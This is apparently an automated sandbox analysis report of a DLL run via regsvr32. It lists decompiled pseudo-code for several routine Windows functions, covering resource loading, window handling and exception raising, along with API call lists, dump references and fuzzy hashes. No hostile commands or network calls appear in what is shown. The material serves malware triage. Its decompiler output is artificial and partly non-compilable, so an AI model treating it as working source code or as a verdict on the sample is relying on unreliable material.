                                                                              0x1001e2bf
                                                                              0x1001e2c2
                                                                              0x1001e2d1
                                                                              0x1001e2da
                                                                              0x1001e2df
                                                                              0x1001e2e2
                                                                              0x1001e2f3
                                                                              0x1001e2f5
                                                                              0x1001e2fa
                                                                              0x1001e2fe
                                                                              0x1001e302
                                                                              0x1001e304
                                                                              0x1001e309
                                                                              0x1001e314
                                                                              0x1001e325
                                                                              0x1001e32c
                                                                              0x1001e32f
                                                                              0x1001e304
                                                                              0x1001e336
                                                                              0x1001e357

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Drag$FileQuery$ActiveFinishWindow
                                                                              • String ID:
                                                                              • API String ID: 892977027-0
                                                                              • Opcode ID: 52f525ffff12431ae3227e788e6b9ed1bbd3ffaac68621dd6990c3f7a489657b
                                                                              • Instruction ID: 1752ce69ce39bc900df758d1927aef76f859a1447436d19f30c9167843178eb4
                                                                              • Opcode Fuzzy Hash: 52f525ffff12431ae3227e788e6b9ed1bbd3ffaac68621dd6990c3f7a489657b
                                                                              • Instruction Fuzzy Hash: EE01D23AB04A8442EB21DB65F8987AD2360FB8EBD9F404121DE9D07750CE7CC986CB00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10015EE8 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 58%
                                                                              			E10015EE8(void* __esi, void* __rax, void* __rcx, void* __rdx, void* __r10) {
				void* _t7;
				void* _t10;
				void* _t11;
				void* _t14;
				void* _t21;
				void* _t32;
				void* _t34;
				void* _t35;
				void* _t36;
				void* _t37;
				void* _t38;

				_t37 = __r10;
				_t20 = __rax;
				_t34 = __rcx;
				if(__rdx == 0) {
					L4:
					_t14 = E10015968(0, _t10, _t20, _t34, _t32, _t35, _t36, _t37);
					if(_t32 != 0 && _t21 != 0) {
						FreeResource();
					}
					return _t14;
				}
				E1000A57C(0, _t10, _t11, __esi, __rax, _t35, _t36, _t38);
				r8d = 0xf0;
				FindResourceW(??, ??, ??);
				if(__rax == 0) {
					goto L4;
				}
				_t7 = LoadResource();
				_t21 = __rax;
				if(__rax != 0) {
					LockResource();
					_t32 = __rax;
					goto L4;
				}
				return _t7;
			}














                                                                              0x10015ee8
                                                                              0x10015ee8
                                                                              0x10015efd
                                                                              0x10015f00
                                                                              0x10015f42
                                                                              0x10015f50
                                                                              0x10015f52
                                                                              0x10015f5c
                                                                              0x10015f5c
                                                                              0x00000000
                                                                              0x10015f62
                                                                              0x10015f02
                                                                              0x10015f07
                                                                              0x10015f17
                                                                              0x10015f20
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10015f28
                                                                              0x10015f31
                                                                              0x10015f34
                                                                              0x10015f39
                                                                              0x10015f3f
                                                                              0x00000000
                                                                              0x10015f3f
                                                                              0x10015f6e

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$FindFreeLoadLock
                                                                              • String ID:
                                                                              • API String ID: 1078018258-0
                                                                              • Opcode ID: cdeb2db0665529aded211187eb39caacf13637c56957a747e73acf335d7df8d8
                                                                              • Instruction ID: e8a48561c0c25091dbd67166e43dd45dfe05d4dee64d8d4efab543a13ae8510d
                                                                              • Opcode Fuzzy Hash: cdeb2db0665529aded211187eb39caacf13637c56957a747e73acf335d7df8d8
                                                                              • Instruction Fuzzy Hash: BFF0C25A30264089EE4AEB532D187A56291AF4DFE3F0E40385D0E4F750EE3CC8C2C700
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1000F298 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Color$ObjectText
                                                                              • String ID:
                                                                              • API String ID: 829078354-0
                                                                              • Opcode ID: f07157cd7de549c15287b395ccba3aebff525bbac6ef92980ca067b012b51fc5
                                                                              • Instruction ID: 36d13afdc741998493712e7c15e1007280fd558720074d5420164f7461b7424f
                                                                              • Opcode Fuzzy Hash: f07157cd7de549c15287b395ccba3aebff525bbac6ef92980ca067b012b51fc5
                                                                              • Instruction Fuzzy Hash: 4C01D13470464487FE55C775BD10BB922D1FB88BE5F214129DE4643F9CDE6CC9C1AA00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10028444 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 61%
                                                                              			E10028444(void* __rax, void* _a80, intOrPtr _a88, intOrPtr* _a176, intOrPtr _a184, intOrPtr _a192, intOrPtr _a200) {
				int _t12;
				void* _t17;
				void* _t18;
				void* _t24;
				intOrPtr* _t33;
				intOrPtr _t35;
				void* _t39;
				void* _t40;
				void* _t41;
				intOrPtr _t42;

				_t24 = __rax;
				_t33 = _a176;
				_t35 = _a88;
				r15d = _a184;
				_t42 = _a200;
				r14d = _a192;
				if(r14d != 0) {
					_t17 = 1;
					E100161B4(_t42);
				}
				if(r15d != 0) {
					_t17 = 1;
					EnableWindow(??, ??);
				}
				if(_t35 != 0) {
					GetActiveWindow();
					_t22 = _t24 -  *((intOrPtr*)(_t33 + 0x40));
					if(_t24 ==  *((intOrPtr*)(_t33 + 0x40))) {
						SetActiveWindow();
					}
				}
				 *((intOrPtr*)( *_t33 + 0xc0))();
				_t12 = E10027BAC(_t17, _t18, _t22,  *_t33, _t33, _t39, _t40, _t41);
				if( *((long long*)(_t33 + 0xb0)) != 0) {
					_t12 = FreeResource();
				}
				return _t12;
			}













                                                                              0x10028444
                                                                              0x10028444
                                                                              0x10028451
                                                                              0x10028456
                                                                              0x1002845e
                                                                              0x10028466
                                                                              0x10028471
                                                                              0x10028473
                                                                              0x1002847b
                                                                              0x1002847b
                                                                              0x10028483
                                                                              0x10028485
                                                                              0x1002848d
                                                                              0x1002848d
                                                                              0x10028496
                                                                              0x10028498
                                                                              0x1002849e
                                                                              0x100284a2
                                                                              0x100284a7
                                                                              0x100284a7
                                                                              0x100284a2
                                                                              0x100284b3
                                                                              0x100284bc
                                                                              0x100284c9
                                                                              0x100284ce
                                                                              0x100284ce
                                                                              0x100284e9

                                                                              APIs
                                                                              • EnableWindow.USER32 ref: 1002848D
                                                                              • GetActiveWindow.USER32 ref: 10028498
                                                                              • SetActiveWindow.USER32 ref: 100284A7
                                                                              • FreeResource.KERNEL32 ref: 100284CE
                                                                                • Part of subcall function 100161B4: EnableWindow.USER32 ref: 100161C6
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ActiveEnable$FreeResource
                                                                              • String ID:
                                                                              • API String ID: 253586258-0
                                                                              • Opcode ID: a6c73bedbdb99ed858045a75cc51fe4fe795f7dc4ce2464e42c37121e75bf989
                                                                              • Instruction ID: 7591c16050db4bd9278b3512659fc6fd41113a7c88013600e0210b73d2e8427f
                                                                              • Opcode Fuzzy Hash: a6c73bedbdb99ed858045a75cc51fe4fe795f7dc4ce2464e42c37121e75bf989
                                                                              • Instruction Fuzzy Hash: 22014F3A30AA9083EA5AEF12F9003AE6361F789FE9F854111DE4A07B55CF78D5D6C701
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1002DBE8 Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 37%
                                                                              			E1002DBE8(void* __ecx, void* __rax, void* __rdx, intOrPtr* __r8, void* __r9, long long _a24) {
				int _t4;
				void* _t7;
				void* _t8;
				void* _t14;
				void* _t29;

				_t14 = __rax;
				_a24 =  *((intOrPtr*)(__r8));
				_t4 = WindowFromPoint(??);
				_t29 = __rax;
				if(__rax != 0) {
					GetParent();
					if(__rax != 0) {
						_t8 = E10029BAC(2, __rax, __r9);
						if(_t8 != 0) {
							return _t8;
						}
					}
					ScreenToClient();
					_t7 = E10029CB8(_t14, _t29, _a24);
					if(_t14 == 0) {
						L6:
						return _t7;
					}
					_t4 = IsWindowEnabled();
					if(_t4 != 0) {
						goto L6;
					}
				}
				return _t4;
			}








                                                                              0x1002dbe8
                                                                              0x1002dbf2
                                                                              0x1002dbf7
                                                                              0x1002dc00
                                                                              0x1002dc03
                                                                              0x1002dc08
                                                                              0x1002dc14
                                                                              0x1002dc1e
                                                                              0x1002dc25
                                                                              0x00000000
                                                                              0x1002dc27
                                                                              0x1002dc25
                                                                              0x1002dc34
                                                                              0x1002dc42
                                                                              0x1002dc4d
                                                                              0x1002dc5f
                                                                              0x00000000
                                                                              0x1002dc5f
                                                                              0x1002dc52
                                                                              0x1002dc5d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1002dc5d
                                                                              0x1002dc68

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ClientEnabledFromParentPointScreen
                                                                              • String ID:
                                                                              • API String ID: 1871804413-0
                                                                              • Opcode ID: db3d74a2c6d5a8a9680d1771a55f92d3ad9b30c1d401ef040bb4bd76808cd69a
                                                                              • Instruction ID: 4a3380ebff2ddc5ec241d507483645b47366bd07bedd18c29905955966a07922
                                                                              • Opcode Fuzzy Hash: db3d74a2c6d5a8a9680d1771a55f92d3ad9b30c1d401ef040bb4bd76808cd69a
                                                                              • Instruction Fuzzy Hash: 58F03C2530674582DD85EB26BA583A9A3D5EB8DFC5F9588298D4D47704EFBCD844C700
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10019B6C Relevance: 6.0, APIs: 4, Instructions: 36COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 29%
                                                                              			E10019B6C(void* __edx, void* __eflags, void* __rax, intOrPtr* __rcx, void* __rdx) {
				intOrPtr _v40;
				int _t8;
				int _t11;
				int _t13;
				void* _t22;

				_t22 = __eflags;
				E100187D0(__eflags, __rcx, __rdx);
				_t8 = E10016020(__rcx);
				asm("bt eax, 0x8");
				if(_t22 < 0) {
					GetParent();
					_t8 = IsZoomed(??);
					if(_t8 == 0) {
						r8d = 0;
						 *((intOrPtr*)( *__rcx + 0x220))();
						_t11 = GetSystemMetrics(??);
						_t13 = GetSystemMetrics(??);
						 *((intOrPtr*)(__rdx + 8)) =  *((intOrPtr*)(__rdx + 8)) - _t11 + _t11 - _v40 - _t13;
						return _t13;
					}
				}
				return _t8;
			}








                                                                              0x10019b6c
                                                                              0x10019b79
                                                                              0x10019b81
                                                                              0x10019b86
                                                                              0x10019b8a
                                                                              0x10019b90
                                                                              0x10019b99
                                                                              0x10019ba1
                                                                              0x10019bab
                                                                              0x10019bb6
                                                                              0x10019bc1
                                                                              0x10019bd7
                                                                              0x10019bdf
                                                                              0x00000000
                                                                              0x10019bdf
                                                                              0x10019ba1
                                                                              0x10019be8

                                                                              APIs
                                                                                • Part of subcall function 10016020: GetWindowLongW.USER32 ref: 10016037
                                                                              • GetParent.USER32 ref: 10019B90
                                                                              • IsZoomed.USER32 ref: 10019B99
                                                                              • GetSystemMetrics.USER32 ref: 10019BC1
                                                                              • GetSystemMetrics.USER32 ref: 10019BD7
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: MetricsSystem$LongParentWindowZoomed
                                                                              • String ID:
                                                                              • API String ID: 3909876373-0
                                                                              • Opcode ID: 737888e452305a3325201bdbace75c3723c8c1e8d4f704738f9aff657e21b4af
                                                                              • Instruction ID: 24aee189cc5ee1d6f6ebfd9bb2a10c18e67160e59536a688669043c1a40aa167
                                                                              • Opcode Fuzzy Hash: 737888e452305a3325201bdbace75c3723c8c1e8d4f704738f9aff657e21b4af
                                                                              • Instruction Fuzzy Hash: 80F0373A71468587EB05DF75ED987992760FB8DB89F4640349E8A4BB54EE38D4848B00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10013590 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 57%
                                                                              			E10013590(void* __ebx, void* __edx, void* __esi, void* __eflags, intOrPtr __rax, void* __rcx, void* __r8, void* __r9) {
				void* _t8;
				void* _t12;
				void* _t13;
				intOrPtr _t21;
				intOrPtr _t23;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t33;

				_t32 = __r9;
				_t31 = __r8;
				_t21 = __rax;
				_t13 = __edx;
				E10011844(__ebx, _t12, __esi, __rax, __rcx, _t29, _t33);
				if(__rax == _t23) {
					GetWindowLongW();
					asm("bt eax, 0x1e");
					if(__eflags >= 0) {
						return GetWindow();
					}
					return GetParent();
				}
				_t27 =  *((intOrPtr*)(__rax + 0x70));
				if( *((intOrPtr*)(__rax + 0x70)) == _t23) {
					GetParent();
					_t27 = __rax;
				}
				_t8 = E10011808(0, _t13, _t21, _t27, _t29, _t31, _t32, _t33);
				if(_t21 != _t23) {
					_t23 =  *((intOrPtr*)(_t21 + 0x40));
				}
				return _t8;
			}












                                                                              0x10013590
                                                                              0x10013590
                                                                              0x10013590
                                                                              0x10013590
                                                                              0x1001359a
                                                                              0x100135a4
                                                                              0x100135d7
                                                                              0x100135e0
                                                                              0x100135e4
                                                                              0x00000000
                                                                              0x100135f3
                                                                              0x00000000
                                                                              0x100135e6
                                                                              0x100135a6
                                                                              0x100135ad
                                                                              0x100135b3
                                                                              0x100135b9
                                                                              0x100135b9
                                                                              0x100135bc
                                                                              0x100135c4
                                                                              0x100135c6
                                                                              0x100135c6
                                                                              0x00000000

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ParentWindow$Long
                                                                              • String ID:
                                                                              • API String ID: 941798831-0
                                                                              • Opcode ID: 3f3e9e0dc8f567e120b5a83e6628184c5350f5a8ba735fc8c73b994168d62f0e
                                                                              • Instruction ID: cd8770fb2eb96f59316dfc23806e9926ea2493814b7a773b013b3a4b0a6af9aa
                                                                              • Opcode Fuzzy Hash: 3f3e9e0dc8f567e120b5a83e6628184c5350f5a8ba735fc8c73b994168d62f0e
                                                                              • Instruction Fuzzy Hash: 0BF0BE35301A4082EF04DB66A9643E82362EB88F99F069830EE1A0B740DE78C8C88300
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1002CC18 Relevance: 6.0, APIs: 4, Instructions: 24COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 58%
                                                                              			E1002CC18(void* __ecx, void* __eflags, void* __rax, void* __rcx, void* __rdx, void* __r11) {
				int _t9;
				int _t10;
				void* _t11;
				void* _t17;
				void* _t18;
				void* _t22;
				void* _t26;
				void* _t27;

				_t22 = __rdx;
				_t17 = __rax;
				_t18 = __rcx;
				E1002C7A0(1, __rcx);
				ReleaseCapture();
				GetDesktopWindow();
				E10011808(_t11, 1, _t17, _t17, _t22, _t26, _t27, __r11);
				_t9 = LockWindowUpdate(??);
				if( *((intOrPtr*)(_t18 + 0x98)) != 0) {
					_t10 = ReleaseDC();
					 *((long long*)(_t18 + 0x98)) = 0;
					return _t10;
				}
				return _t9;
			}











                                                                              0x1002cc18
                                                                              0x1002cc18
                                                                              0x1002cc24
                                                                              0x1002cc27
                                                                              0x1002cc2c
                                                                              0x1002cc32
                                                                              0x1002cc3b
                                                                              0x1002cc45
                                                                              0x1002cc55
                                                                              0x1002cc5f
                                                                              0x1002cc65
                                                                              0x00000000
                                                                              0x1002cc65
                                                                              0x1002cc76

                                                                              APIs
                                                                                • Part of subcall function 1002C7A0: GetStockObject.GDI32 ref: 1002C7C7
                                                                                • Part of subcall function 1002C7A0: InflateRect.USER32 ref: 1002C89A
                                                                              • ReleaseCapture.USER32 ref: 1002CC2C
                                                                              • GetDesktopWindow.USER32 ref: 1002CC32
                                                                              • LockWindowUpdate.USER32 ref: 1002CC45
                                                                              • ReleaseDC.USER32 ref: 1002CC5F
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ReleaseWindow$CaptureDesktopInflateLockObjectRectStockUpdate
                                                                              • String ID:
                                                                              • API String ID: 1260764132-0
                                                                              • Opcode ID: 6dbcd3ca780ccc91638b7e594d34186620bbabfad8844de97b5285f7d77671d8
                                                                              • Instruction ID: 3f0426b38c53f3c32e7cff55f690a47fbddf9860ee16e096b55e0de56b4d243e
                                                                              • Opcode Fuzzy Hash: 6dbcd3ca780ccc91638b7e594d34186620bbabfad8844de97b5285f7d77671d8
                                                                              • Instruction Fuzzy Hash: 92F030B970168882DB059B61F8493886361FB4EFD9F558034CD4907315DF74C4D88700
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1003F31F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 59%
                                                                              			E1003F31F(void* __ecx, long* __rax, long long __rbx, void* __rcx, void* __rdx, void* __rdi, void* __rsi, void* __rbp, void* __r8, void* __r12, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40, long long _a48, long long _a56, long long _a64, intOrPtr _a72, intOrPtr* _a88, intOrPtr _a96, intOrPtr* _a104, void* _a128, void* _a136, void* _a144, void* _a160, void* _a168, void* _a176, void* _a184) {
				void* _t37;
				intOrPtr _t38;
				long* _t57;
				long long _t62;
				long long _t70;
				intOrPtr* _t73;
				intOrPtr* _t84;
				intOrPtr* _t86;
				long long _t88;

				_t82 = __r12;
				_t78 = __r8;
				_t75 = __rbp;
				_t68 = __rdx;
				_t57 = __rax;
				_a32 = 1;
				E1003D060(__rax, __rbx, __rcx, __rdx, __rdi, __rsi, __rbp, __r8, __r12);
				r12d = 0;
				 *((intOrPtr*)(_t57 + 0x2d0)) = r12d;
				if(_a36 == r12d) {
					_t73 = _a40;
					r8d =  *((intOrPtr*)(_t73 + 0x18));
					RaiseException(??, ??, ??, ??);
				} else {
					_t73 = _a40;
					E1003EE60(1, _t73);
					r8d =  *((intOrPtr*)(_a72 + 0x18));
					RaiseException(??, ??, ??, ??);
				}
				r12d = _a32;
				_t62 = _a56;
				_t88 = _a64;
				_t70 = _a48;
				_t84 = _a104;
				_t86 = _a88;
				_t65 = _t86;
				E10039FD0(_t57, _t62, _t86, _t70);
				if(r12d == 0 &&  *_t73 == 0xe06d7363 &&  *((intOrPtr*)(_t73 + 0x18)) == 4) {
					_t38 =  *((intOrPtr*)(_t73 + 0x20));
					if(_t38 == 0x19930520 || _t38 == 0x19930521 || _t38 == 0x19930522) {
						_t65 =  *((intOrPtr*)(_t73 + 0x28));
						if(E10039F80(_t57,  *((intOrPtr*)(_t73 + 0x28))) != 0) {
							_t65 = _t73;
							E1003EE60(1, _t73);
						}
					}
				}
				E1003D060(_t57, _t62, _t65, _t68, _t70, _t73, _t75, _t78, _t82);
				 *((long long*)(_t57 + 0xf0)) = _t70;
				_t37 = E1003D060(_t57, _t62, _t65, _t68, _t70, _t73, _t75, _t78, _t82);
				 *((long long*)(_t57 + 0xf8)) = _t88;
				 *((long long*)( *((intOrPtr*)(_a96 + 0x1c)) +  *_t84)) = 0xfffffffe;
				return _t37;
			}












                                                                              0x1003f31f
                                                                              0x1003f31f
                                                                              0x1003f31f
                                                                              0x1003f31f
                                                                              0x1003f31f
                                                                              0x1003f31f
                                                                              0x1003f327
                                                                              0x1003f32c
                                                                              0x1003f32f
                                                                              0x1003f33b
                                                                              0x1003f368
                                                                              0x1003f371
                                                                              0x1003f37a
                                                                              0x1003f33d
                                                                              0x1003f33f
                                                                              0x1003f347
                                                                              0x1003f355
                                                                              0x1003f360
                                                                              0x1003f360
                                                                              0x1003f380
                                                                              0x1003f385
                                                                              0x1003f38a
                                                                              0x1003f38f
                                                                              0x1003f394
                                                                              0x1003f399
                                                                              0x1003f39e
                                                                              0x1003f3a1
                                                                              0x1003f3a9
                                                                              0x1003f3b9
                                                                              0x1003f3c1
                                                                              0x1003f3d1
                                                                              0x1003f3dc
                                                                              0x1003f3e0
                                                                              0x1003f3e3
                                                                              0x1003f3e3
                                                                              0x1003f3dc
                                                                              0x1003f3c1
                                                                              0x1003f3e8
                                                                              0x1003f3ed
                                                                              0x1003f3f4
                                                                              0x1003f3f9
                                                                              0x1003f40d
                                                                              0x1003f457

                                                                              APIs
                                                                                • Part of subcall function 1003D060: GetLastError.KERNEL32(?,?,?,?,10049A32,?,?,?,?,?,?,?,?,1004809E), ref: 1003D06E
                                                                                • Part of subcall function 1003D060: FlsGetValue.KERNEL32(?,?,?,?,10049A32,?,?,?,?,?,?,?,?,1004809E), ref: 1003D07C
                                                                                • Part of subcall function 1003D060: FlsSetValue.KERNEL32(?,?,?,?,10049A32,?,?,?,?,?,?,?,?,1004809E), ref: 1003D0A8
                                                                                • Part of subcall function 1003D060: GetCurrentThreadId.KERNEL32(?,?,?,?,10049A32,?,?,?,?,?,?,?,?,1004809E), ref: 1003D0BC
                                                                                • Part of subcall function 1003D060: SetLastError.KERNEL32(?,?,?,?,10049A32,?,?,?,?,?,?,?,?,1004809E), ref: 1003D0DA
                                                                              • RaiseException.KERNEL32 ref: 1003F360
                                                                              • RaiseException.KERNEL32 ref: 1003F37A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorExceptionLastRaiseValue$CurrentThread
                                                                              • String ID: csm
                                                                              • API String ID: 2851347870-1018135373
                                                                              • Opcode ID: bec073cf64a728d91946d2b0dd9b60561aa0d0cd6da3c1768933a3603238d0d9
                                                                              • Instruction ID: 2d64967585048316f2f0da217b8f1edeb045a753f5df0b95e10342bfd87f36f1
                                                                              • Opcode Fuzzy Hash: bec073cf64a728d91946d2b0dd9b60561aa0d0cd6da3c1768933a3603238d0d9
